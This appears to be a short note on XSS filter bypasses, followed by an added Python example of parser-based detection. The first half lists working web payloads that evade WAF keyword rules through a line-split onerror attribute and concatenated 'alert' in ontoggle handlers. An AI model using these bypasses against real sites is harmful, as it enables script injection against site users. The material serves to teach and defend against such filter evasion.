Notes on XSS bypass

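Sometimes a WAF filters payloads for keywords and event attributes such as onerror and alert, or replaces those keywords with other characters, but does not block the event attribute when it stands alone. In that case, line breaks get around the filter:
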
<img src=1 
onerror
=alert(1)


If the protection targets only alert, string concatenation gets around it (%2B is the URL-encoded +):

<details open ontoggle=top['al'%2B'ert'](1) >
<details open ontoggle=self['al'%2B'ert'](1) >
<details open ontoggle=parent['al'%2B'ert'](1) >
<details open ontoggle=frames['al'%2B'ert'](1) >
<details open ontoggle=content['al'%2B'ert'](1) >
<details open ontoggle=window['al'%2B'ert'](1) >
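
Why both tricks work against keyword matching, and what a parser-based check sees instead, as an added example that is not part of the original note. The rule set and function names are hypothetical; the check uses Python's standard html.parser to look at attribute names after parsing rather than at the raw string.

```python
import re
from html.parser import HTMLParser

# Hypothetical keyword rules of the kind the note describes (not a real WAF's rules).
NAIVE_RULES = {
    "event_attr": re.compile(r"on\w+=", re.I),  # handler name directly followed by '='
    "alert_call": re.compile(r"alert", re.I),   # literal keyword
}

def naive_hits(markup):
    """Names of the keyword rules that match the raw string."""
    return sorted(n for n, rx in NAIVE_RULES.items() if rx.search(markup))

class _HandlerFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        # The parser has already normalised whitespace and case, so a handler
        # split across lines still arrives as a single attribute name.
        self.found += [(tag, name) for name, _ in attrs if name.startswith("on")]

def event_handlers(markup):
    """(tag, attribute) pairs for every on* attribute found after parsing."""
    finder = _HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.found

# Constructed samples: the note's two payload shapes (the first closed with '>'
# so it parses as a complete tag) and one harmless link.
SAMPLES = {
    "newline_split": "<img src=1 \nonerror\n=alert(1)>",
    "concatenation": "<details open ontoggle=top['al'%2B'ert'](1) >",
    "benign_link": '<a href="/pay?donation=5">alert settings</a>',
}

if __name__ == "__main__":
    for label, markup in SAMPLES.items():
        print(f"{label:14} keyword={naive_hits(markup)} parsed={event_handlers(markup)}")
```

Each keyword rule misses one of the two shapes and both fire on the harmless link, while the parsed view flags exactly the two handler attributes. Detection of this kind complements, and does not replace, context-aware output encoding and allowlist sanitisation.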

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.